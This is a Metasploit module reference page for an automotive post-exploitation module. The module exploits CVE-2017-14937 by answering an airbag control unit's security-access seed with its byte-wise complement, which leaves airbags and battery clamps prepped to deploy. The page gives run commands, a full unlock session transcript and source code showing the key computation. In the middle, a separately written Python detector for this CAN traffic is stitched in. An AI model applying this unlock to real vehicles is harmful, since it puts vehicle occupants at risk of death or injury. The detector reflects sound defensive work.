Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.) - Metasploit


This page contains detailed information about how to use the post/hardware/automotive/pdt Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
Module: post/hardware/automotive/pdt
Source code: modules/post/hardware/automotive/pdt.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Hardware
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-14937

Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/hardware/automotive/pdt

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/hardware/automotive/pdt
msf post(pdt) > show options
    ... show and set options ...
msf post(pdt) > set SESSION session-id
msf post(pdt) > exploit

If you wish to run the post module against all sessions from the framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/hardware/automotive/pdt")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


This module is based on research by Johannes Braun and Juergen Duerrwang, which you can read more about in the references listed below, together with the related CVE-2017-14937.

Options


SRCID

This is the source CAN ID (the tester's arbitration ID) used for the PCU connection. Default is 0x7F1.

DSTID

This is the CAN ID on which the PCU's response is expected. Default is 0x7F9 (SRCID + 8).

CANBUS

Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.

PADDING

Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default.

Scenarios


A successful unlock that leaves the pyrotechnic devices of a target vehicle prepped to deploy:

$ ./msfconsole -q
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > set uripath /
uripath => /
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module running as background job 0.

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.0.2.4:8080/
[*] Server started.

msf auxiliary(local_hwbridge) > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-12-17 10:41:27 -0600
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge >
hwbridge > run post/hardware/automotive/pdt canbus=

[*] Gathering Data...
[*]  VIN: 5555
[*] Loop info (1 pyrotechnic devices):
[*]   69 | battery clamp main battery
[*]      |  Deployment Status: Fail ()
[*]  Number of PCUs in vehicle     | 1
[*]  Info About First PCU
[*]  Address format this PCU(s)    | 11 bit normal addressing
[*]  Number of pyrotechnic charges | 1
[*]  Version of ISO26021 standard  | 1
[*]  ACL type                      | CAN only
[*]  ACL Type version              | 1
[*]
[*] Switching to Diagnostic Session 0x04...
[*] Getting Security Access Seed...
[*] Success.  Seed: ["01", "CF", "00", "00", "00"]
[*] Attempting to unlock device...
[*] Success!
[!] Warning! You are now able to start the deployment of airbags in this vehicle
[!] *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
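The session above is the traffic pattern a defender would want to recognise on the bus: a switch to diagnostic session 0x04 on the PCU address, a SecurityAccess seed request, and a key that is simply the byte-wise complement of the seed. The following detector is an added example, not code from the Metasploit module or its documentation. It parses candump-style log lines, decodes ISO-TP single frames, and raises an alert when that sequence appears on the module's default CAN IDs (0x7F1 request, 0x7F9 response). The UDS service IDs (DiagnosticSessionControl 0x10, SecurityAccess 0x27, positive response SID + 0x40) are assumed from ISO 14229 and are not stated on this page; the log lines are constructed to mirror the seed shown above (01 CF 00 00 00), not captured from a vehicle.

```python
"""Detect the PDT-style security-access sequence in a candump log.

Added defensive example; assumes ISO 14229 service IDs and ISO-TP
single-frame encoding (first byte = payload length). The sample log
at the bottom is constructed, not captured.
"""
import re
from dataclasses import dataclass, field

PDT_REQUEST_ID = 0x7F1   # module default SRCID (tester -> PCU)
PCU_RESPONSE_ID = 0x7F9  # module default DSTID (SRCID + 8)
SID_DSC, SID_SA = 0x10, 0x27        # assumed UDS service IDs
PDT_SESSION = 0x04                  # session the module switches to
SEED_LEVEL, KEY_LEVEL = 0x5F, 0x60  # sub-functions used by the module
NEGATIVE_RESPONSE = 0x7F

# candump -L style line: "(timestamp) iface ID#HEXDATA"
LINE_RE = re.compile(
    r"^\((?P<ts>[\d.]+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-Fa-f]+)#(?P<data>[0-9A-Fa-f]*)$"
)


@dataclass
class Alert:
    ts: float
    severity: str
    message: str


@dataclass
class PdtDetector:
    """Tracks one tester<->PCU conversation and emits alerts."""
    seed: list = field(default_factory=list)
    alerts: list = field(default_factory=list)

    def _emit(self, ts, severity, message):
        self.alerts.append(Alert(ts, severity, message))

    def feed(self, line):
        m = LINE_RE.match(line.strip())
        if not m:
            return  # not a candump line; ignore it
        ts, can_id = float(m["ts"]), int(m["id"], 16)
        raw = bytes.fromhex(m["data"])
        if not raw or raw[0] >> 4 != 0:
            return  # only ISO-TP single frames are decoded here
        payload = raw[1:1 + (raw[0] & 0x0F)]
        if len(payload) < 2:
            return
        sid, sub, data = payload[0], payload[1], payload[2:]
        if can_id == PDT_REQUEST_ID:
            self._on_request(ts, sid, sub, data)
        elif can_id == PCU_RESPONSE_ID:
            self._on_response(ts, sid, sub, data)

    def _on_request(self, ts, sid, sub, data):
        if sid == SID_DSC and sub == PDT_SESSION:
            self._emit(ts, "medium", "DiagnosticSessionControl 0x04 requested on PCU address")
        elif sid == SID_SA and sub == SEED_LEVEL:
            self._emit(ts, "medium", "SecurityAccess seed requested (level 0x5F)")
        elif sid == SID_SA and sub == KEY_LEVEL:
            # The weak default algorithm: key bytes are 0xFF minus the seed bytes.
            expected = [0xFF - b for b in self.seed[:2]]
            if len(expected) == 2 and list(data[:2]) == expected:
                self._emit(ts, "high", "SecurityAccess key is the complement of the seed (weak default algorithm)")
            else:
                self._emit(ts, "low", "SecurityAccess key submitted")

    def _on_response(self, ts, sid, sub, data):
        if sid == SID_SA + 0x40 and sub == SEED_LEVEL:
            self.seed = list(data)  # remember the seed for the key check
        elif sid == SID_SA + 0x40 and sub == KEY_LEVEL:
            self._emit(ts, "critical", "PCU accepted the key: pyrotechnic devices are prepped for deployment")
        elif sid == NEGATIVE_RESPONSE:
            self.seed = []  # rejected request; drop any stale seed


def scan(lines):
    """Run the detector over an iterable of log lines and return the alerts."""
    det = PdtDetector()
    for line in lines:
        det.feed(line)
    return det.alerts


# Constructed sample log mirroring the scenario above (seed 01 CF 00 00 00).
SAMPLE_LOG = [
    "(1513528887.100) can0 7F1#0210040000000000",  # 10 04: switch to session 0x04
    "(1513528887.102) can0 7F9#0650040032000000",  # 50 04: positive response
    "(1513528887.110) can0 7F1#02275F0000000000",  # 27 5F: request seed
    "(1513528887.112) can0 7F9#07675F01CF000000",  # 67 5F 01 CF 00 00 00: seed
    "(1513528887.120) can0 7F1#042760FE30000000",  # 27 60 FE 30: complement key
    "(1513528887.122) can0 7F9#0267600000000000",  # 67 60: unlocked
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.ts:.3f} [{a.severity}] {a.message}")
```

Run against the constructed log, the detector produces four alerts that escalate from medium (session switch, seed request) to high (complement key) to critical (positive key response); a key that is not the seed's complement is reported at low severity instead, which separates a legitimate tester from the weak-algorithm case this module exercises.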


Msfconsole Usage


Here is how the hardware/automotive/pdt post exploitation module looks in the msfconsole:

msf6 > use post/hardware/automotive/pdt

msf6 post(hardware/automotive/pdt) > show info

       Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
     Module: post/hardware/automotive/pdt
   Platform: Hardware
       Arch: 
       Rank: Normal

Provided by:
  Johannes Braun
  Juergen Duerrwang
  Craig Smith

Compatible session types:
  Hwbridge

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
  DSTID    2041             no        Expected reponse ID, defaults to SRCID + 8
  PADDING  0                no        Pad the packet with extra bytes to always be 8 bytes long
  SESSION                   yes       The session to run this module on.
  SRCID    2033             yes       Module ID to query

Description:
  Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), 
  this module will first query all Pyrotechnic Control Units (PCUs) in 
  the target vehicle to discover how many pyrotechnic devices are 
  present, then attempt to validate the security access token using 
  the default simplified algorithm. On success, the vehicle will be in 
  a state that is prepped to deploy its pyrotechnic devices (e.g. 
  airbags, battery clamps, etc.) via the service routine. (ISO 26021)

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-14937
  https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts

Module Options


This is a complete list of options available in the hardware/automotive/pdt post exploitation module:

msf6 post(hardware/automotive/pdt) > show options

Module options (post/hardware/automotive/pdt):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
   DSTID    2041             no        Expected reponse ID, defaults to SRCID + 8
   PADDING  0                no        Pad the packet with extra bytes to always be 8 bytes long
   SESSION                   yes       The session to run this module on.
   SRCID    2033             yes       Module ID to query

Advanced Options


Here is a complete list of advanced options supported by the hardware/automotive/pdt post exploitation module:

msf6 post(hardware/automotive/pdt) > show advanced

Module advanced options (post/hardware/automotive/pdt):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the hardware/automotive/pdt module can do:

msf6 post(hardware/automotive/pdt) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the hardware/automotive/pdt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(hardware/automotive/pdt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check the possible causes in the code snippets below, taken from the module source code; this often helps in identifying the root cause of the problem.

error


Here is a relevant code snippet related to the "error" error message:

259:	    print_status(" ACL type                      | #{ACL_TYPES[acl_type_definition.hex]}")
260:	    print_status(" ACL Type version              | #{acl_type_version.hex}")
261:	    print_status
262:	    print_status('Switching to Diagnostic Session 0x04...')
263:	    resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
264:	    if resp.key? 'error'
265:	      print_error("Could not switch to DSC 0x04: #{resp['error']}")
266:	      return
267:	    end
268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)

Could not switch to DSC 0x04: <ERROR>


Here is a relevant code snippet related to the "Could not switch to DSC 0x04: <ERROR>" error message:

260:	    print_status(" ACL Type version              | #{acl_type_version.hex}")
261:	    print_status
262:	    print_status('Switching to Diagnostic Session 0x04...')
263:	    resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
264:	    if resp.key? 'error'
265:	      print_error("Could not switch to DSC 0x04: #{resp['error']}")
266:	      return
267:	    end
268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270:	    print_status('Getting Security Access Seed...')

error


Here is a relevant code snippet related to the "error" error message:

267:	    end
268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270:	    print_status('Getting Security Access Seed...')
271:	    seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
272:	    if seed.key? 'error'
273:	       print_error("Couldn't get seed: #{seed['error']}")
274:	       return
275:	    end
276:	    print_status("Success.  Seed: #{seed['SEED']}")
277:	    print_status('Attempting to unlock device...')

Couldn't get seed: <ERROR>


Here is a relevant code snippet related to the "Couldn't get seed: <ERROR>" error message:

268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270:	    print_status('Getting Security Access Seed...')
271:	    seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
272:	    if seed.key? 'error'
273:	       print_error("Couldn't get seed: #{seed['error']}")
274:	       return
275:	    end
276:	    print_status("Success.  Seed: #{seed['SEED']}")
277:	    print_status('Attempting to unlock device...')
278:	    display_warning = false

error


Here is a relevant code snippet related to the "error" error message:

280:	      print_status('Security Access Already Unlocked!!')
281:	      display_warning = true
282:	    else
283:	      key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
284:	      resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
285:	      if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
286:	        print_error("Invalid SA Response.  System not vulnerable. Error: #{resp['error']}")
287:	        return
288:	      end
289:	      found_valid = false
290:	      if (resp.key? 'Packets') && resp['Packets'].size > 0

Invalid SA Response. System not vulnerable. Error: <ERROR>


Here is a relevant code snippet related to the "Invalid SA Response. System not vulnerable. Error: <ERROR>" error message:

281:	      display_warning = true
282:	    else
283:	      key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
284:	      resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
285:	      if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
286:	        print_error("Invalid SA Response.  System not vulnerable. Error: #{resp['error']}")
287:	        return
288:	      end
289:	      found_valid = false
290:	      if (resp.key? 'Packets') && resp['Packets'].size > 0
291:	        resp['Packets'].each do |i|

Unknown response: <RESP.INSPECT>


Here is a relevant code snippet related to the "Unknown response: <RESP.INSPECT>" error message:

294:	      end
295:	      if found_valid
296:	        print_status('Success!')
297:	        display_warning = true
298:	      else
299:	        print_error("Unknown response: #{resp.inspect}")
300:	      end
301:	    end
302:	    if display_warning
303:	      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304:	      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')

Warning! You are now able to start the deployment of airbags in this vehicle


Here is a relevant code snippet related to the "Warning! You are now able to start the deployment of airbags in this vehicle" error message:

298:	      else
299:	        print_error("Unknown response: #{resp.inspect}")
300:	      end
301:	    end
302:	    if display_warning
303:	      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304:	      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
305:	    end
306:	  end
307:	
308:	end

*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***


Here is a relevant code snippet related to the "*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***" error message:

298:	      else
299:	        print_error("Unknown response: #{resp.inspect}")
300:	      end
301:	    end
302:	    if display_warning
303:	      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304:	      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
305:	    end
306:	  end
307:	
308:	end



Authors


  • Johannes Braun
  • Juergen Duerrwang
  • Craig Smith

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
